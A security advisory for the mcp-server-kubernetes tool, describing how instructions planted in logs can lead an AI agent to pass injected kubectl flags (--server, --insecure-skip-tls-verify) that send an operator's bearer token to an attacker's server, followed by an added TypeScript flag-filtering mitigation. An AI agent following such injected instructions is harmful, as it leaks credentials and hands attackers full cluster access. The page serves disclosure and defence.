GHSA-6mx4-4h42-r8vh: MCP Server Kubernetes: kubectl-generic flag injection enables Kubernetes bearer token exfiltration
Summary
The `kubectl_generic` tool in `mcp-server-kubernetes` passes arbitrary kubectl flags through without validation, so an attacker who can influence the tool's arguments can inject flags such as `--server=https://attacker.com` and `--insecure-skip-tls-verify=true`. When a privileged operator uses the MCP server and an AI agent follows attacker-controlled instructions embedded in logs it reads, kubectl sends the operator's Kubernetes bearer token to the attacker's server; that token can then be replayed to gain full cluster access.
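One mitigation for the flaw described above, written for this page as an added example rather than code from `mcp-server-kubernetes`: a pre-exec filter that rejects kubectl's connection and credential flags (and the `config` subcommand) before the argument list reaches kubectl. The flag names are kubectl's real global flags; the deny policy itself and the function names are this example's assumptions.

```typescript
// Added example (not the project's own code): filter argument lists that a
// kubectl_generic-style tool would otherwise hand straight to kubectl.
// Any flag that changes which API server receives the request, which
// credentials are sent, or whether TLS is verified is rejected, so an injected
// `--server=https://...` cannot redirect the operator's bearer token.

const DENIED_LONG_FLAGS = new Set([
  "--server", "--kubeconfig", "--token", "--insecure-skip-tls-verify",
  "--certificate-authority", "--client-certificate", "--client-key",
  "--username", "--password", "--context", "--cluster", "--user",
  "--tls-server-name", "--proxy-url", "--as", "--as-group", "--as-uid",
]);
// kubectl's only short-form connection flag is -s (alias of --server).
const DENIED_SHORT = "s";
// `kubectl config set clusters.<name>.server URL` retargets the kubeconfig with
// positional arguments only, so the subcommand is denied outright.
const DENIED_SUBCOMMANDS = new Set(["config"]);

interface ArgCheck { ok: boolean; reason?: string }

function checkKubectlArgs(args: string[]): ArgCheck {
  for (const raw of args) {
    if (raw.startsWith("--")) {
      // Catches "--server=URL" and "--server URL" (value in the next token).
      const name = raw.split("=", 1)[0];
      if (DENIED_LONG_FLAGS.has(name)) {
        return { ok: false, reason: `connection/credential flag rejected: ${raw}` };
      }
    } else if (raw.startsWith("-") && raw.length > 1) {
      // pflag accepts clusters ("-As") and attached values ("-shttps://...").
      // Reject any cluster containing the denied letter; a false positive
      // (e.g. "-lservice=x") is the safe failure direction.
      const cluster = raw.slice(1).split("=", 1)[0];
      if (cluster.includes(DENIED_SHORT)) {
        return { ok: false, reason: `short flag cluster may set --server: ${raw}` };
      }
    } else if (DENIED_SUBCOMMANDS.has(raw)) {
      // Checked on every non-flag token, since "-n ns config ..." would
      // otherwise hide the subcommand behind a flag value.
      return { ok: false, reason: `subcommand rejected: ${raw}` };
    }
  }
  return { ok: true };
}

// Builds argv for child_process.execFile (no shell, so no quoting surprises),
// or throws so the tool reports an error to the agent instead of running kubectl.
function buildKubectlArgv(args: string[]): string[] {
  const check = checkKubectlArgs(args);
  if (!check.ok) throw new Error(check.reason);
  return ["kubectl", ...args];
}
```

Tokens after a `--` separator are deliberately still inspected; a false positive there costs a failed call, a false negative costs the token.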
Vulnerability Details
EPSS: 0.0%
June 5, 2026
Original source: https://github.com/advisories/GHSA-6mx4-4h42-r8vh
First tracked: June 5, 2026 at 02:00 PM